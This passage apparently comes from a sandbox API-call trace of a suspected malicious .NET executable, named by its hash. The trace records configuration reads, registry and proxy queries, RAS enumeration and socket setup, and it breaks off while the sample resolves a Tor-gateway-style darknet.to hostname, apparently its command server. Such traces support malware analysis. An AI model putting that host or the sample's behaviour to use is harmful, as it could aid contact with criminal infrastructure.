ftLastWriteTime.dwLowDateTime=0x982bc0b8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x8c8f)) returned 1 [0138.004] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x14d8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Config\\machine.config", lpFilePart=0x0) returned 0x45 [0138.004] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x14dd80) returned 1 [0138.004] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\config\\machine.config"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x478 [0138.004] GetFileType (hFile=0x478) returned 0x1 [0138.004] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x14dcf0) returned 1 [0138.004] GetFileType (hFile=0x478) returned 0x1 [0138.066] GetFileSize (in: hFile=0x478, lpFileSizeHigh=0x14de58 | out: lpFileSizeHigh=0x14de58*=0x0) returned 0x8c8f [0138.067] ReadFile (in: hFile=0x478, lpBuffer=0x2105e00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14ddc8, lpOverlapped=0x0 | out: lpBuffer=0x2105e00*, lpNumberOfBytesRead=0x14ddc8*=0x1000, lpOverlapped=0x0) returned 1 [0138.217] ReadFile (in: hFile=0x478, lpBuffer=0x2105e00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14dba8, lpOverlapped=0x0 | out: lpBuffer=0x2105e00*, lpNumberOfBytesRead=0x14dba8*=0x1000, lpOverlapped=0x0) returned 1 [0138.220] ReadFile (in: hFile=0x478, lpBuffer=0x2105e00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d998, lpOverlapped=0x0 | out: lpBuffer=0x2105e00*, lpNumberOfBytesRead=0x14d998*=0x1000, lpOverlapped=0x0) returned 1 [0138.221] ReadFile (in: hFile=0x478, lpBuffer=0x2105e00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d998, lpOverlapped=0x0 | out: lpBuffer=0x2105e00*, lpNumberOfBytesRead=0x14d998*=0x1000, lpOverlapped=0x0) returned 1 [0138.222] ReadFile (in: hFile=0x478, lpBuffer=0x2105e00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d998, lpOverlapped=0x0 | out: lpBuffer=0x2105e00*, lpNumberOfBytesRead=0x14d998*=0x1000, lpOverlapped=0x0) returned 1 [0138.222] ReadFile (in: hFile=0x478, lpBuffer=0x2105e00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d858, lpOverlapped=0x0 | out: lpBuffer=0x2105e00*, lpNumberOfBytesRead=0x14d858*=0x1000, lpOverlapped=0x0) returned 1 [0138.235] ReadFile (in: hFile=0x478, lpBuffer=0x2105e00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14da98, lpOverlapped=0x0 | out: lpBuffer=0x2105e00*, lpNumberOfBytesRead=0x14da98*=0x1000, lpOverlapped=0x0) returned 1 [0138.535] ReadFile (in: hFile=0x478, lpBuffer=0x2105e00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d948, lpOverlapped=0x0 | out: lpBuffer=0x2105e00*, lpNumberOfBytesRead=0x14d948*=0x1000, lpOverlapped=0x0) returned 1 [0138.535] ReadFile (in: hFile=0x478, lpBuffer=0x2105e00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d948, lpOverlapped=0x0 | out: lpBuffer=0x2105e00*, lpNumberOfBytesRead=0x14d948*=0xc8f, lpOverlapped=0x0) returned 1 [0138.536] ReadFile (in: hFile=0x478, lpBuffer=0x2105e00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14da68, lpOverlapped=0x0 | out: lpBuffer=0x2105e00*, lpNumberOfBytesRead=0x14da68*=0x0, lpOverlapped=0x0) returned 1 [0138.537] CloseHandle (hObject=0x478) returned 1 [0138.538] GetCurrentProcess () returned 0xffffffffffffffff [0138.538] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x14e068 | out: TokenHandle=0x14e068*=0x478) returned 1 [0138.539] GetCurrentProcess () returned 0xffffffffffffffff [0138.539] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x14e068 | out: TokenHandle=0x14e068*=0x3ec) returned 1 [0138.540] GetCurrentProcess () returned 0xffffffffffffffff [0138.540] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x14de68 | out: TokenHandle=0x14de68*=0x40c) returned 1 [0138.540] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\458ad7362cfb6980b9e7eb19ab83ddc6d261bf6b057f1892267dd55c656e9686.exe.config" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\458ad7362cfb6980b9e7eb19ab83ddc6d261bf6b057f1892267dd55c656e9686.exe.config"), fInfoLevelId=0x0, lpFileInformation=0x14df20 | out: lpFileInformation=0x14df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0138.541] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\458ad7362cfb6980b9e7eb19ab83ddc6d261bf6b057f1892267dd55c656e9686.exe.config", nBufferLength=0x105, lpBuffer=0x14d8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\458ad7362cfb6980b9e7eb19ab83ddc6d261bf6b057f1892267dd55c656e9686.exe.config", lpFilePart=0x0) returned 0x69 [0138.541] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\458ad7362cfb6980b9e7eb19ab83ddc6d261bf6b057f1892267dd55c656e9686.exe.config" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\458ad7362cfb6980b9e7eb19ab83ddc6d261bf6b057f1892267dd55c656e9686.exe.config"), fInfoLevelId=0x0, lpFileInformation=0x14df08 | out: lpFileInformation=0x14df08*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0138.542] GetCurrentProcess () returned 0xffffffffffffffff [0138.542] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x14e068 | out: TokenHandle=0x14e068*=0x498) returned 1 [0138.542] GetCurrentProcess () returned 0xffffffffffffffff [0138.543] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x14e068 | out: TokenHandle=0x14e068*=0x47c) returned 1 [0138.560] GetCurrentProcess () returned 0xffffffffffffffff [0138.560] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x14ddb8 | out: TokenHandle=0x14ddb8*=0x4a8) returned 1 [0138.648] GetCurrentProcess () returned 0xffffffffffffffff [0138.648] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x14ddc8 | out: TokenHandle=0x14ddc8*=0x4ac) returned 1 [0138.757] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x4b0 [0138.759] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x4b4 [0138.767] GetCurrentProcess () returned 0xffffffffffffffff [0138.767] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x14ddc8 | out: TokenHandle=0x14ddc8*=0x4b8) returned 1 [0138.869] GetCurrentProcess () returned 0xffffffffffffffff [0138.869] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x14ddd8 | out: TokenHandle=0x14ddd8*=0x4bc) returned 1 [0138.874] QueryPerformanceFrequency (in: lpFrequency=0x7ff8001169a0 | out: lpFrequency=0x7ff8001169a0*=100000000) returned 1 [0138.874] QueryPerformanceCounter (in: lpPerformanceCount=0x14e448 | out: lpPerformanceCount=0x14e448*=2286101841578) returned 1 [0138.880] GetCurrentProcess () returned 0xffffffffffffffff [0138.880] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x14dcc8 | out: TokenHandle=0x14dcc8*=0x4c0) returned 1 [0138.885] GetCurrentProcess () returned 0xffffffffffffffff [0138.885] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x14dcd8 | out: TokenHandle=0x14dcd8*=0x4c4) returned 1 [0138.896] GetCurrentProcess () returned 0xffffffffffffffff [0138.896] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x14dd38 | out: TokenHandle=0x14dd38*=0x4c8) returned 1 [0138.900] GetCurrentProcess () returned 0xffffffffffffffff [0138.900] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x14dd48 | out: TokenHandle=0x14dd48*=0x4cc) returned 1 [0139.164] GetCurrentProcess () returned 0xffffffffffffffff [0139.164] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x14e218 | out: TokenHandle=0x14e218*=0x4d0) returned 1 [0139.179] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x20019, phkResult=0x14c238 | out: phkResult=0x14c238*=0x4d4) returned 0x0 [0139.179] RegQueryValueExW (in: hKey=0x4d4, lpValueName="InstallationType", lpReserved=0x0, lpType=0x14c288, lpData=0x0, lpcbData=0x14c280*=0x0 | out: lpType=0x14c288*=0x1, lpData=0x0, lpcbData=0x14c280*=0xe) returned 0x0 [0139.180] RegQueryValueExW (in: hKey=0x4d4, lpValueName="InstallationType", lpReserved=0x0, lpType=0x14c288, lpData=0x2139188, lpcbData=0x14c280*=0xe | out: lpType=0x14c288*=0x1, lpData="Client", lpcbData=0x14c280*=0xe) returned 0x0 [0139.180] RegCloseKey (hKey=0x4d4) returned 0x0 [0140.169] CoTaskMemAlloc (cb=0xcd0) returned 0x1d23f610 [0140.206] RasEnumConnectionsW (in: param_1=0x1d23f610, param_2=0x14e1c0, param_3=0x14e1c8 | out: param_1=0x1d23f610, param_2=0x14e1c0, param_3=0x14e1c8) returned 0x0 [0145.132] CoTaskMemFree (pv=0x1d23f610) [0145.154] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x14df18 | out: lpWSAData=0x14df18) returned 0 [0145.319] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x52c [0145.381] setsockopt (s=0x52c, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0145.381] closesocket (s=0x52c) returned 0 [0145.382] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x52c [0145.383] setsockopt (s=0x52c, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0145.383] closesocket (s=0x52c) returned 0 [0145.384] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x52c [0145.385] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x530 [0145.387] ioctlsocket (in: s=0x52c, cmd=-2147195266, argp=0x14e1e8 | out: argp=0x14e1e8) returned 0 [0145.388] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x534 [0145.388] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x538 [0145.388] ioctlsocket (in: s=0x534, cmd=-2147195266, argp=0x14e1e8 | out: argp=0x14e1e8) returned 0 [0145.390] WSAIoctl (in: s=0x52c, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x14e170, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x14e170, lpOverlapped=0x0) returned -1 [0145.393] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x14dd50, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0145.401] WSAEventSelect (s=0x52c, hEventObject=0x530, lNetworkEvents=512) returned 0 [0145.401] WSAIoctl (in: s=0x534, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x14e170, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x14e170, lpOverlapped=0x0) returned -1 [0145.402] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x14dd50, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0145.402] WSAEventSelect (s=0x534, hEventObject=0x538, lNetworkEvents=512) returned 0 [0145.403] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x540 [0145.488] RasConnectionNotificationW (param_1=0xffffffffffffffff, param_2=0x540, param_3=0x3) returned 0x0 [0145.503] RegOpenCurrentUser (in: samDesired=0x20019, phkResult=0x14e258 | out: phkResult=0x14e258*=0x558) returned 0x0 [0145.504] RegOpenKeyExW (in: hKey=0x558, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e198 | out: phkResult=0x14e198*=0x55c) returned 0x0 [0145.504] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x560 [0145.504] RegNotifyChangeKeyValue (hKey=0x55c, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x560, fAsynchronous=1) returned 0x0 [0145.506] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e1a0 | out: phkResult=0x14e1a0*=0x564) returned 0x0 [0145.506] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x568 [0145.506] RegNotifyChangeKeyValue (hKey=0x564, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x568, fAsynchronous=1) returned 0x0 [0145.506] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e1a0 | out: phkResult=0x14e1a0*=0x56c) returned 0x0 [0145.506] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x570 [0145.507] RegNotifyChangeKeyValue (hKey=0x56c, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x570, fAsynchronous=1) returned 0x0 [0145.507] GetCurrentProcess () returned 0xffffffffffffffff [0145.507] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x14e128 | out: TokenHandle=0x14e128*=0x574) returned 1 [0145.609] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d278 | out: phkResult=0x14d278*=0x58c) returned 0x0 [0145.611] RegQueryValueExW (in: hKey=0x58c, lpValueName="LegacyWPADSupport", lpReserved=0x0, lpType=0x14d2b8, lpData=0x0, lpcbData=0x14d2b0*=0x0 | out: lpType=0x14d2b8*=0x0, lpData=0x0, lpcbData=0x14d2b0*=0x0) returned 0x2 [0145.612] RegCloseKey (hKey=0x58c) returned 0x0 [0145.629] WinHttpOpen (pszAgentW=0x0, dwAccessType=0x1, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x5475b0 [0145.833] WinHttpSetTimeouts (hInternet=0x5475b0, nResolveTimeout=60000, nConnectTimeout=60000, nSendTimeout=60000, nReceiveTimeout=60000) returned 1 [0145.834] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0x14e1a0 | out: pProxyConfig=0x14e1a0) returned 1 [0145.996] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Net.HttpWebRequest_Disabled", lpBuffer=0x14d2b0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0145.997] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Net.HttpWebRequest_MinCount", lpBuffer=0x14d2b0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0146.004] EtwEventRegister () returned 0x0 [0146.004] EtwEventSetInformation () returned 0x0 [0146.010] GetCurrentProcess () returned 0xffffffffffffffff [0146.010] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x14dc98 | out: TokenHandle=0x14dc98*=0x5c4) returned 1 [0146.014] GetCurrentProcess () returned 0xffffffffffffffff [0146.014] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x14dca8 | out: TokenHandle=0x14dca8*=0x5d0) returned 1 [0146.038] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x14df20*=0x540, lpdwindex=0x14dcf4 | out: lpdwindex=0x14dcf4) returned 0x80010115 [0146.043] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x14ded0*=0x530, lpdwindex=0x14dca4 | out: lpdwindex=0x14dca4) returned 0x80010115 [0146.043] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x14ded0*=0x538, lpdwindex=0x14dca4 | out: lpdwindex=0x14dca4) returned 0x80010115 [0146.044] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x14dfa0*=0x560, lpdwindex=0x14dd74 | out: lpdwindex=0x14dd74) returned 0x80010115 [0146.045] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x14dfa0*=0x568, lpdwindex=0x14dd74 | out: lpdwindex=0x14dd74) returned 0x80010115 [0146.045] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x14dfa0*=0x570, lpdwindex=0x14dd74 | out: lpdwindex=0x14dd74) returned 0x80010115 [0146.063] GetCurrentProcess () returned 0xffffffffffffffff [0146.063] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x14dbd8 | out: TokenHandle=0x14dbd8*=0x5d4) returned 1 [0146.064] GetCurrentProcess () returned 0xffffffffffffffff [0146.064] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x14dbe8 | out: TokenHandle=0x14dbe8*=0x5d8) returned 1 [0146.068] GetTimeZoneInformation (in: lpTimeZoneInformation=0x14df60 | out: lpTimeZoneInformation=0x14df60) returned 0x2 [0146.069] GetDynamicTimeZoneInformation (in: pTimeZoneInformation=0x14dd78 | out: pTimeZoneInformation=0x14dd78) returned 0x2 [0146.074] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Time Zones\\W. Europe Standard Time", ulOptions=0x0, samDesired=0x20019, phkResult=0x14dd48 | out: phkResult=0x14dd48*=0x5dc) returned 0x0 [0146.076] RegQueryValueExW (in: hKey=0x5dc, lpValueName="TZI", lpReserved=0x0, lpType=0x14dd88, lpData=0x0, lpcbData=0x14dd80*=0x0 | out: lpType=0x14dd88*=0x3, lpData=0x0, lpcbData=0x14dd80*=0x2c) returned 0x0 [0146.076] RegQueryValueExW (in: hKey=0x5dc, lpValueName="TZI", lpReserved=0x0, lpType=0x14dd88, lpData=0x2141df0, lpcbData=0x14dd80*=0x2c | out: lpType=0x14dd88*=0x3, lpData=0x2141df0*, lpcbData=0x14dd80*=0x2c) returned 0x0 [0146.078] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Time Zones\\W. Europe Standard Time\\Dynamic DST", ulOptions=0x0, samDesired=0x20019, phkResult=0x14db58 | out: phkResult=0x14db58*=0x0) returned 0x2 [0146.079] RegQueryValueExW (in: hKey=0x5dc, lpValueName="MUI_Display", lpReserved=0x0, lpType=0x14dd18, lpData=0x0, lpcbData=0x14dd10*=0x0 | out: lpType=0x14dd18*=0x1, lpData=0x0, lpcbData=0x14dd10*=0x20) returned 0x0 [0146.079] RegQueryValueExW (in: hKey=0x5dc, lpValueName="MUI_Display", lpReserved=0x0, lpType=0x14dd18, lpData=0x21422f0, lpcbData=0x14dd10*=0x20 | out: lpType=0x14dd18*=0x1, lpData="@tzres.dll,-320", lpcbData=0x14dd10*=0x20) returned 0x0 [0146.079] RegQueryValueExW (in: hKey=0x5dc, lpValueName="MUI_Std", lpReserved=0x0, lpType=0x14dd18, lpData=0x0, lpcbData=0x14dd10*=0x0 | out: lpType=0x14dd18*=0x1, lpData=0x0, lpcbData=0x14dd10*=0x20) returned 0x0 [0146.079] RegQueryValueExW (in: hKey=0x5dc, lpValueName="MUI_Std", lpReserved=0x0, lpType=0x14dd18, lpData=0x2142360, lpcbData=0x14dd10*=0x20 | out: lpType=0x14dd18*=0x1, lpData="@tzres.dll,-322", lpcbData=0x14dd10*=0x20) returned 0x0 [0146.079] RegQueryValueExW (in: hKey=0x5dc, lpValueName="MUI_Dlt", lpReserved=0x0, lpType=0x14dd18, lpData=0x0, lpcbData=0x14dd10*=0x0 | out: lpType=0x14dd18*=0x1, lpData=0x0, lpcbData=0x14dd10*=0x20) returned 0x0 [0146.079] RegQueryValueExW (in: hKey=0x5dc, lpValueName="MUI_Dlt", lpReserved=0x0, lpType=0x14dd18, lpData=0x21423d0, lpcbData=0x14dd10*=0x20 | out: lpType=0x14dd18*=0x1, lpData="@tzres.dll,-321", lpcbData=0x14dd10*=0x20) returned 0x0 [0146.082] CoTaskMemAlloc (cb=0x20c) returned 0x547e30 [0146.082] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x547e30 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0146.083] CoTaskMemFree (pv=0x547e30) [0146.083] CoTaskMemAlloc (cb=0x20c) returned 0x5468f0 [0146.083] GetFileMUIPath (in: dwFlags=0x10, pcwszFilePath="C:\\Windows\\system32\\tzres.dll", pwszLanguage=0x0, pcchLanguage=0x14dd68, pwszFileMUIPath=0x5468f0, pcchFileMUIPath=0x14dd70, pululEnumerator=0x14dd60 | out: pwszLanguage=0x0, pcchLanguage=0x14dd68, pwszFileMUIPath="C:\\Windows\\system32\\en-US\\tzres.dll.mui", pcchFileMUIPath=0x14dd70, pululEnumerator=0x14dd60) returned 1 [0146.106] CoTaskMemFree (pv=0x0) [0146.106] CoTaskMemFree (pv=0x5468f0) [0146.107] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\en-US\\tzres.dll.mui", hFile=0x0, dwFlags=0x2) returned 0x1ab20001 [0146.125] CoTaskMemAlloc (cb=0x3ec) returned 0x1d2422a0 [0146.126] LoadStringW (in: hInstance=0x1ab20001, uID=0x140, lpBuffer=0x1d2422a0, cchBufferMax=500 | out: lpBuffer="(UTC+01:00) Amsterdam, Berlin, Bern, Rome, Stockholm, Vienna") returned 0x3c [0146.126] CoTaskMemFree (pv=0x1d2422a0) [0146.126] FreeLibrary (hLibModule=0x1ab20001) returned 1 [0146.127] CoTaskMemAlloc (cb=0x20c) returned 0x5468f0 [0146.127] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x5468f0 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0146.127] CoTaskMemFree (pv=0x5468f0) [0146.127] CoTaskMemAlloc (cb=0x20c) returned 0x547e30 [0146.128] GetFileMUIPath (in: dwFlags=0x10, pcwszFilePath="C:\\Windows\\system32\\tzres.dll", pwszLanguage=0x0, pcchLanguage=0x14dd68, pwszFileMUIPath=0x547e30, pcchFileMUIPath=0x14dd70, pululEnumerator=0x14dd60 | out: pwszLanguage=0x0, pcchLanguage=0x14dd68, pwszFileMUIPath="C:\\Windows\\system32\\en-US\\tzres.dll.mui", pcchFileMUIPath=0x14dd70, pululEnumerator=0x14dd60) returned 1 [0146.131] CoTaskMemFree (pv=0x0) [0146.131] CoTaskMemFree (pv=0x547e30) [0146.131] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\en-US\\tzres.dll.mui", hFile=0x0, dwFlags=0x2) returned 0x1ab20001 [0146.135] CoTaskMemAlloc (cb=0x3ec) returned 0x1d2422a0 [0146.135] LoadStringW (in: hInstance=0x1ab20001, uID=0x142, lpBuffer=0x1d2422a0, cchBufferMax=500 | out: lpBuffer="W. Europe Standard Time") returned 0x17 [0146.135] CoTaskMemFree (pv=0x1d2422a0) [0146.135] FreeLibrary (hLibModule=0x1ab20001) returned 1 [0146.136] CoTaskMemAlloc (cb=0x20c) returned 0x5468f0 [0146.136] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x5468f0 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0146.136] CoTaskMemFree (pv=0x5468f0) [0146.136] CoTaskMemAlloc (cb=0x20c) returned 0x547e30 [0146.136] GetFileMUIPath (in: dwFlags=0x10, pcwszFilePath="C:\\Windows\\system32\\tzres.dll", pwszLanguage=0x0, pcchLanguage=0x14dd68, pwszFileMUIPath=0x547e30, pcchFileMUIPath=0x14dd70, pululEnumerator=0x14dd60 | out: pwszLanguage=0x0, pcchLanguage=0x14dd68, pwszFileMUIPath="C:\\Windows\\system32\\en-US\\tzres.dll.mui", pcchFileMUIPath=0x14dd70, pululEnumerator=0x14dd60) returned 1 [0146.151] CoTaskMemFree (pv=0x0) [0146.151] CoTaskMemFree (pv=0x547e30) [0146.151] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\en-US\\tzres.dll.mui", hFile=0x0, dwFlags=0x2) returned 0x1ab20001 [0146.154] CoTaskMemAlloc (cb=0x3ec) returned 0x1d2422a0 [0146.154] LoadStringW (in: hInstance=0x1ab20001, uID=0x141, lpBuffer=0x1d2422a0, cchBufferMax=500 | out: lpBuffer="W. Europe Daylight Time") returned 0x17 [0146.154] CoTaskMemFree (pv=0x1d2422a0) [0146.154] FreeLibrary (hLibModule=0x1ab20001) returned 1 [0146.155] RegCloseKey (hKey=0x5dc) returned 0x0 [0146.157] SetEvent (hEvent=0x4b0) returned 1 [0146.181] SetEvent (hEvent=0x4b0) returned 1 [0146.199] GetNetworkParams (in: pFixedInfo=0x0, pOutBufLen=0x14e148 | out: pFixedInfo=0x0, pOutBufLen=0x14e148) returned 0x6f [0146.957] LocalAlloc (uFlags=0x0, uBytes=0x258) returned 0x1d244850 [0146.957] GetNetworkParams (in: pFixedInfo=0x1d244850, pOutBufLen=0x14e148 | out: pFixedInfo=0x1d244850, pOutBufLen=0x14e148) returned 0x0 [0146.990] LocalFree (hMem=0x1d244850) returned 0x0 [0146.997] CoTaskMemAlloc (cb=0x20c) returned 0x504de0 [0146.997] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Net.Connection_Disabled", lpBuffer=0x504de0, nSize=0x104 | out: lpBuffer="") returned 0x0 [0146.997] CoTaskMemFree (pv=0x504de0) [0146.997] CoTaskMemAlloc (cb=0x20c) returned 0x504de0 [0146.997] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Net.Connection_MinCount", lpBuffer=0x504de0, nSize=0x104 | out: lpBuffer="") returned 0x0 [0146.998] CoTaskMemFree (pv=0x504de0) [0147.023] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x62c [0147.028] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x604 [0147.029] GetAddrInfoW (in: pNodeName="v4u3zio7rhmgkzzk5jvekgojl6an3dthyxzapy3zhdhhaelnj6iicfqd.darknet.to", pServiceName=0x0, pHints=0x14dfb8*(ai_flags=2, ai_family=0, 